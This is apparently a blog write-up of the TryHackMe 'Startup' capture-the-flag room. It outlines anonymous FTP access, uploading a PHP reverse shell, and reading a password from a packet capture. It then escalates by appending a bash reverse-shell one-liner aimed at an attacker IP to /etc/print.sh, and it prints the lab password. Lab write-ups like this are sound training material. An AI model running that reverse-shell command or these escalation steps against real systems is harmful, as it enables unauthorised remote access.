,

Startup CTF

https://tryhackme.com/room/startup

Run a nmap scan to find for open ports.

Connect to the FTP server as anonymous.

Retrieve the files to find for clues.

Put a php reverse shell script in the FTP folder.

Start a listener.

cat recipe.txt to find the first answer.

Start a python simple server and upload linpeas to the victim box.

Found a interesting file.

Copy the file to the ftp server.

cp /incidents/suspicious.pcapng /var/www/html/files/ftp/

Its a wireshark file, follow the tcp stream to find the password for lennie.

c4ntg3t3n0ughsp1c3

Change user to lennie.

First flag is found.

Head to the scripts folder and examine the files.

We can edit the /etc/print.sh file , edit the file with bash reverse shell script.

echo ‘bash -i >& /dev/tcp/10.4.55.237/1337 0>&1’ >> /etc/print.sh

Start a netcat listener and the final flag is found.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (

0

)

%d bloggers like this: